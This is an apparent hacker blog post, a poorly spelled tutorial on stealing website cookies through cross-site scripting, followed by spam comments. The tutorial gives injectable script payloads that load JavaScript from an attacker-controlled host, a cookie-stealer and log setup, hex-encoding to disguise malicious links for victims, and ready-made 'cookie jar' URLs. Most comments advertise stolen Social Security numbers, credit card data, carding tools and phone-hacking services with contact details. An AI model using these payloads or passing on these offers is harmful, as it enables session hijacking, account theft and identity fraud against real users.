cross site scripting XSS cookie stealing tutorial

well what is a xss attack well this is the art of runing scrips in ur victoms pc you can allmost run any script in ther broswer with the right knowlge the most ideas xss is used for stealing cookies
the cookies are bits of infomation used by web servers / web sites to check who u are on on that site
if your a gest it will set a cookie saying ur a gest when u login it will replace that cookie with ur cookie that you loged in with taht will have ur login id , sometimes if its a forum ur password encrpted in md5 hash
and other stuff what the site can think of useing to make sure u are who u say u are
like session id's what exspire after a time limit what the server sets like 10 mins or 60 mins
well in the cookie it has sections that are named so when the server checks who you are
it will read bits of data like the ID and the md5 hash if its a forum most
of the time a forum will be useing the cookie prefix as defult like
nukeevo_ID and so on but the forum admin can change that .


Whats a user id? well this if you are the first to sign up to a forum ur id will be ONE because you
will be the first in the sql table ... i will talk about the sql tables latter. the admin account is
nearly allmost all the time ID 1 or 2 because of corse he wud of had to make the account first
to config the forum now when looking for this type of attack the is ways looking for this type of attack
first geting the hacker point of view of this is to run that script no matter what looking at every way
he or she can find on myspace the was useing flash files to not steal cookies because myspace filter
java script but insted rederecting to a fake login page the files for this can be found in downloads.
that was useing .swf files but the newist one for myspace is useing .mov files this is useing quicktime files
to get a url what wud be to your fake log in a good FREE server to host to run php files is
www.php1h.com you wold upload your cookie stealing scripts on taht server so you can send the users cookie
to that site and view it in the log.

ok how you cud set it up wud be

http://evilhacker.php1h.com/cookiestealer.php = this is the back bone it takes the cookie from the java script we run called XSS.js

http://evilhacker.php1h.com/log.php    = this is the log wher the cookie will be sent after the cookiestealer has sent it to the log

www.evilhacker.php1h.com/xss.js     = this is the java script that gives the cookie to the cookiestealer.php


: finidng xss attacks :
well the first way will be viewing the site and looking around for any input box's and then viewing the sorce of that site for the name of the input
box we find a xss exspoit in when looking for a xss u need to make sure that
u look at the url in the URLbar and u mite see stuff that look like
www.site.com/blah.html or .php or .cfm or .jsp ..
make sure it has the full url and if it has stuff after a ? mark add it at the end of the url like this by useing a &
www.site.com/page.php?MID=2&(NAME_OF_INPUT_BOX)=(script) so if the input box was called milk for someresion i dono why but just for this tut lets say that.and that the script will just print the words Xss on screen.

www.site.com/page.php?MID=2&MILK="><script>alert("Xss")</script>

the is "> because it tells the input box to stop reading ther and then it runs the java script
and if the input box was called cat it wud look like this

www.site.com/page.php?MID=2&cat="><script>alert("Xss")</script>

so go round a site looking for any type of input box's some times i find if a site has
send to a friend that email box some times works.

after u found it like u get a pop up with the words Xss in it then u will view sorce and look for the words XSs in a input box the basic synax for how it will look like is

<input type="hidden" name="milk" value="" />
you see and from ther you will make the url
what i will talk about at the end  so after finding that a xss and ur able 2 run it in ur broswer
you wont to start runing the cookie grabing scripts in ur broswer they will look like this

www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>

if u sent some one that link in a email or on msn it wud run in ther broswer
to execute that java script to steal ther cookies from site.com so if you found a xss in msn.com
you wold have the cookies from msn.com

but you mite ask your self how do i swap my cookies ? well if you are useing firefox the is a add on u can install called cookie editer and
then you can edit your cookies or useing IE im sure you can edit them in internet temp files or somethink but your best bet is FF(firefox)
just remeber when u steal the cookies thay all wont be one long string thay shud be broken up in 2 names like UID,others....out ther but u will just have
to work that out for your self

sending the link to a victom can be hard work sometimes if some one sent you a link that looked like this :
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>    i wudnt click it
but :P if u encrpted some of the words in that url in to hex like this
useing this table :
[img]http://62.31.49.95/asciifull.gif[/img]
you cud encrpt it to look sometink like this

%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E   = is the script encoded in hex
wud u click that insted and to send it throght msn you mite wont to add a nother & at the end and fill it with shit
like
www.site.com/page.php?MID=2&MILK=%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E&mk=12<that wud just make it think it needs to include the link the full of it the is other ways like useing .gif images to run the script on the site but thats a nother story.

well thats it for now hope you injoyed the read
VOl :v60-hackers:

:info:
i have set up some cookie jars for the people to lazzy

http://v60.php1h.com/cookiejar/xss.js
http://v60.php1h.com/cookiejar/log.php

18 comments:

  1. thanks for the posts majority of them had helped me and now its one of my best helping blog for me nice...work keep it up

    ReplyDelete
    Replies
    1. SSN FULLZ AVAILABLE

      Fresh & valid spammed USA SSN+Dob Leads with DL available in bulk & high credit 700+

      >>1$ each SSN+DOB
      >>3$ each with SSN+DOB+DL
      >>5$ each for premium fullz (700+ credit score with replacement guarantee)

      Prices are negotiable in bulk order
      Serious buyer contact me no time wasters please
      Bulk order will be preferable

      CONTACT
      Telegram > @leadsupplier
      ICQ > 752822040
      Email > leads.sellers1212@gmail.com

      OTHER STUFF YOU CAN GET

      SSN+DOB Fullz
      CC's with CVV's (vbv & non-vbv)
      USA Photo ID'S (Front & back)

      All type of Tools & Tutorials available
      (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

      SQL Injector
      Premium Accounts (Netflix, Pornhub, etc)
      Paypal Logins
      Bitcoin Cracker
      SMTP Linux Root
      DUMPS with pins track 1 and 2
      WU & Bank transfers
      Socks, rdp's, vpn
      Php mailer
      Server I.P's
      HQ Emails with passwords
      All types of tools & tutorials.. & much more

      Looking for long term business
      For trust full vendor, feel free to contact

      CONTACT
      Telegram > @leadsupplier
      ICQ > 752822040
      Email > leads.sellers1212@gmail.com

      Delete
    2. LEGIT FULLZ & TOOLS STORE

      Hello to All !

      We are offering all types of tools & Fullz on discounted price.
      If you are in search of anything regarding fullz, tools, tutorials, Hack Pack, etc
      Feel Free to contact

      ***CONTACT 24/7***
      **Telegram > @leadsupplier
      **ICQ > 752822040
      **Skype > Peeterhacks
      **Wicker me > peeterhacks

      "SSN LEADS/FULLZ AVAILABLE"
      "TOOLS & TUTORIALS AVAILABLE FOR HACKING, SPAMMING,
      CARDING, CASHOUT, CLONING, SCRIPTING ETC"

      **************************************
      "Fresh Spammed SSN Fullz info included"
      >>SSN FULLZ with complete info
      >>CC With CVV Fullz USA
      >>FULLZ FOR SBA, PUA & TAX RETURN FILLING
      >>USA I.D Photos Front & Back
      >>High Credit Score fullz (700+ Scores)
      >>DL number, Employee Details, Bank Details Included
      >>Complete Premium Info with Relative Info

      ***************************************
      COMPLETE GUIDE FOR TUTORIALS & TOOLS

      "SPAMMING" "HACKING" "CARDING" "CASH OUT"
      "KALI LINUX" "BLOCKCHAIN BLUE PRINTS" "SCRIPTING"
      "FRAUD BIBLE"

      "TOOLS & TUTORIALS LIST"
      =>Ethical Hacking Ebooks, Tools & Tutorials
      =>Bitcoin Hacking
      =>Kali Linux
      =>Fraud Bible
      =>RAT
      =>Keylogger & Keystroke Logger
      =>Whatsapp Hacking & Hacked Version of Whatsapp
      =>Facebook & Google Hacking
      =>Bitcoin Flasher
      =>SQL Injector
      =>Premium Logs (PayPal/Amazon/Coinbase/Netflix/FedEx/Banks)
      =>Bitcoin Cracker
      =>SMTP Linux Root
      =>Shell Scripting
      =>DUMPS with pins track 1 and 2 with & without pin
      =>SMTP's, Safe Socks, Rdp's brute
      =>PHP mailer
      =>SMS Sender & Email Blaster
      =>Cpanel
      =>Server I.P's & Proxies
      =>Viruses & VPN's
      =>HQ Email Combo (Gmail, Yahoo, Hotmail, MSN, AOL, etc.)

      *Serious buyers will always welcome
      *Price will be reduce in bulk order
      *Discount offers will gives to serious buyers
      *Hope we do a great business together

      ===>Contact 24/7<===
      ==>Telegram > @leadsupplier
      ==>ICQ > 752822040
      ==>Skype > Peeterhacks
      ==>Wicker me > peeterhacks

      Delete
    3. Fullz & Tools with Tutorials Available
      Genuine Stuff

      SSN DOB DL FULLZ
      CC with CVV FULLZ
      HIGH CREDIT FULLZ
      DUMPS TRACK 101 & 202
      I'm Available ON:
      752822040-->ICQ
      @killhacks-->Tele-gram

      All Tools With tutorials Guide
      Car-ding Spa-mming Hac-king Scr-ipting
      With ebooks & complete guides
      752822040-->ICQ
      @killhacks-->Tele-gram

      Delete
  2. You are genius dude, hats off to you. Keep doing like this. Hosting Raja Review

    ReplyDelete
    Replies
    1. "SSN LEADS/FULLZ AVAILABLE"
      "TOOLS & TUTORIALS AVAILABLE"

      ***Contact Details***
      =>Telegram > @leadsupplier
      =>ICQ > 752822040
      =>Skype > Peeterhacks
      =>Wicker me > peeterhacks

      **************************************
      >>SSN DOB DL FULLZ with complete info
      >>CC With CVV (vbv & non vbv)
      >>FULLZ FOR SBA, PUA & TAX RETURN FILLING
      >>I.D Photos Front & Back
      >>High Credit fullz
      >>Premium Fullz

      ***************************************
      All Types of Tools & Tutorials Available

      "SPAMMING" "ETHICAL HACKING" "CARDING" "CASHING"
      "KALI LINUX" "SCRIPTING"

      "OTHER STUFF"
      =>BTC Flasher/Cracker
      =>SQL Injector
      =>Logins
      =>SMTP Linux Root
      =>DUMPS with pins track 1 and 2 with & without pin
      =>SMS Sender & Email Blaster
      =>Server I.P's & Proxies
      =>HQ Email Combo

      =>Telegram > @leadsupplier
      =>ICQ > 752822040
      =>Skype > Peeterhacks
      =>Wicker me > peeterhacks

      *Serious buyers will always welcome
      *Price will be reduce in bulk order
      *Hope we do a great business together

      Delete
  3. This article clears my mind. Writer has done great job. Best thing about this blog is its simplicity. Thank you so much. Keep posting
    Geometrydashonline.net
    Basketballlegendsgame.com

    ReplyDelete
  4. Access to computers and other control systems which might provide you with information about the way the world revolves around technology should be unlimited and total. All information should be free and accessible to all. That is why we at INTEGRATEDHACKS  have come come up with a team of highly motivated and dedicated hackers to help you get access to information you are being deprived of. Our services include and are not limited to hacking of social media accounts,email accounts, tracking of phones hacking of bank cards and many more.
     Have you ever been hacked? Need to recover your stolen account, Want to monitor your kids,spouse or partner, Change your school results track messages from an email or mobile number and many more, INTEGRATEDHACKS is the one for you. Hundreds of our clients have their phones, social media accounts, emails, servers, may bots and PCs hacked consistently and efficiently. Our professional hackers for hire team is highly qualified and can hack anything or device you desire without giving the target any form of notification which makes us one of the best.


     ★ Contact Us For Your Desired Hacking services via : integratedhacks@cyberservices.com and experience cyber hacking like never before.

    ReplyDelete
  5. Water Hack Burns 2 lb of Fat OVERNIGHT

    Over 160 000 women and men are losing weight with a easy and SECRET "water hack" to lose 1-2 lbs each and every night as they sleep.

    It is scientific and it works on everybody.

    This is how you can do it yourself:

    1) Go get a clear glass and fill it up with water half glass

    2) And then follow this weight losing hack

    and be 1-2 lbs skinnier when you wake up!

    ReplyDelete
  6. A very awesome blog post. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. I was exactly searching for. Every router and modem has login credentials and a default IP address that allows you to access the settings. 192.168.l.254 is one such IP address used to access settings of routers like TP-Link, 2Wire, ADSL routers, 3Corn routers and Westel ADSL moderns to name a few.

    ReplyDelete
  7. Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  8. i was lost with no hope for my wife was cheating and had always got away with it because i did not know how or

    always too scared to pin anything on her. with the help a friend who recommended me to who help hack her phone,

    email, chat, sms and expose her for a cheater she is. I just want to say a big thank you to

    SUPERIOR.HACK@GMAIL.COM . am sure someone out there is looking for how to solve his relationship problems, you can also contact him for all sorts of hacking job..he is fast and reliable. you could also text +1 213-295-1376(whatsapp) contact and thank me later

    ReplyDelete
  9. Hi Guy's

    Fresh & valid spammed USA SSN+Dob Leads with DL available in bulk.

    >>1$ each SSN+DOB
    >>2$ each with SSN+DOB+DL
    >>5$ each for premium (also included relative info)

    Prices are negotiable in bulk order
    Serious buyer contact me no time wasters please
    Bulk order will be preferable

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    OTHER STUFF YOU CAN GET

    SSN+DOB Fullz
    CC's with CVV's (vbv & non-vbv)
    USA Photo ID'S (Front & back)

    All type of tutorials available
    (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

    SMTP Linux Root
    DUMPS with pins track 1 and 2
    Socks, rdp's, vpn's
    Server I.P's
    HQ Emails with passwords

    Looking for long term business
    For trust full vendor, feel free to contact

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    ReplyDelete
  10. LEGIT FULLZ & TOOLS STORE

    Hello to All !

    We are offering all types of tools & Fullz on discounted price.
    If you are in search of anything regarding fullz, tools, tutorials, Hack Pack, etc
    Feel Free to contact

    ***CONTACT 24/7***
    **Telegram > @leadsupplier
    **ICQ > 752822040
    **Skype > Peeterhacks
    **Wicker me > peeterhacks

    "SSN LEADS/FULLZ AVAILABLE"
    "TOOLS & TUTORIALS AVAILABLE FOR HACKING, SPAMMING,
    CARDING, CASHOUT, CLONING, SCRIPTING ETC"

    **************************************
    "Fresh Spammed SSN Fullz info included"
    >>SSN FULLZ with complete info
    >>CC With CVV Fullz USA
    >>FULLZ FOR SBA, PUA & TAX RETURN FILLING
    >>USA I.D Photos Front & Back
    >>High Credit Score fullz (700+ Scores)
    >>DL number, Employee Details, Bank Details Included
    >>Complete Premium Info with Relative Info

    ***************************************
    COMPLETE GUIDE FOR TUTORIALS & TOOLS

    "SPAMMING" "HACKING" "CARDING" "CASH OUT"
    "KALI LINUX" "BLOCKCHAIN BLUE PRINTS" "SCRIPTING"
    "FRAUD BIBLE"

    "TOOLS & TUTORIALS LIST"
    =>Ethical Hacking Ebooks, Tools & Tutorials
    =>Bitcoin Hacking
    =>Kali Linux
    =>Fraud Bible
    =>RAT
    =>Keylogger & Keystroke Logger
    =>Whatsapp Hacking & Hacked Version of Whatsapp
    =>Facebook & Google Hacking
    =>Bitcoin Flasher
    =>SQL Injector
    =>Premium Logs (PayPal/Amazon/Coinbase/Netflix/FedEx/Banks)
    =>Bitcoin Cracker
    =>SMTP Linux Root
    =>Shell Scripting
    =>DUMPS with pins track 1 and 2 with & without pin
    =>SMTP's, Safe Socks, Rdp's brute
    =>PHP mailer
    =>SMS Sender & Email Blaster
    =>Cpanel
    =>Server I.P's & Proxies
    =>Viruses & VPN's
    =>HQ Email Combo (Gmail, Yahoo, Hotmail, MSN, AOL, etc.)

    *Serious buyers will always welcome
    *Price will be reduce in bulk order
    *Discount offers will gives to serious buyers
    *Hope we do a great business together

    ===>Contact 24/7<===
    ==>Telegram > @leadsupplier
    ==>ICQ > 752822040
    ==>Skype > Peeterhacks
    ==>Wicker me > peeterhacks

    ReplyDelete

  11. I know an organization who have private investigators for hire who can help you get into your spouse’s phones,emails remotely from your phone they can also help you with your
    * credit score
    * clearing of criminal record
    *increasing of school grades and any thing that has to do with hacking etc
    You can confirm for yourself from their email support@wavedrive.tech or website https://wavedrive.tech so you can also give your testimony
    Whatsapp No: +14106350697

    ReplyDelete
  12. "SSN LEADS/FULLZ AVAILABLE"
    "TOOLS & TUTORIALS AVAILABLE"

    ***Contact Details***
    =>Telegram > @leadsupplier
    =>ICQ > 752822040
    =>Skype > Peeterhacks
    =>Wicker me > peeterhacks

    **************************************
    >>SSN DOB DL FULLZ with complete info
    >>CC With CVV (vbv & non vbv)
    >>FULLZ FOR SBA, PUA & TAX RETURN FILLING
    >>I.D Photos Front & Back
    >>High Credit fullz
    >>Premium Fullz

    ***************************************
    All Types of Tools & Tutorials Available

    "SPAMMING" "ETHICAL HACKING" "CARDING" "CASHING"
    "KALI LINUX" "SCRIPTING"

    "OTHER STUFF"
    =>BTC Flasher/Cracker
    =>SQL Injector
    =>Logins
    =>SMTP Linux Root
    =>DUMPS with pins track 1 and 2 with & without pin
    =>SMS Sender & Email Blaster
    =>Server I.P's & Proxies
    =>HQ Email Combo

    =>Telegram > @leadsupplier
    =>ICQ > 752822040
    =>Skype > Peeterhacks
    =>Wicker me > peeterhacks

    *Serious buyers will always welcome
    *Price will be reduce in bulk order
    *Hope we do a great business together

    ReplyDelete
  13. Fullz & Tools with Tutorials Available
    Genuine Stuff

    SSN DOB DL FULLZ
    CC with CVV FULLZ
    HIGH CREDIT FULLZ
    DUMPS TRACK 101 & 202
    I'm Available ON:
    752822040-->ICQ
    @killhacks-->Tele-gram

    All Tools With tutorials Guide
    Car-ding Spa-mming Hac-king Scr-ipting
    With ebooks & complete guides
    752822040-->ICQ
    @killhacks-->Tele-gram

    ReplyDelete
  14. Not Too Late to Take Action

    Even the most cautious individuals can fall victim to sophisticated frauds, but it's not too late to take action. We can assist you in identifying the harm caused by con artists, and we'll provide you with the resources you need to stop them from hurting other people.

    #money #moneyonline #funds #chargeback #recovery #chargebackcompany #moneyatrisk #forexmarkets #onlinefraud #onlinescams #scams #tradingscam #forextrading #forexmoney #onlinetrading #tradingonline #ActionRefund
    ----------------------------------------------------------
    Sign up for a free consultation with Rustik Cyber Hack Service . today. and see how we can help you recover your money.

    web site rustikcyberhackservice. com

    E mail rustikcyberhackservice@gmail.com contact@rustikcyberhackservice.com

    ReplyDelete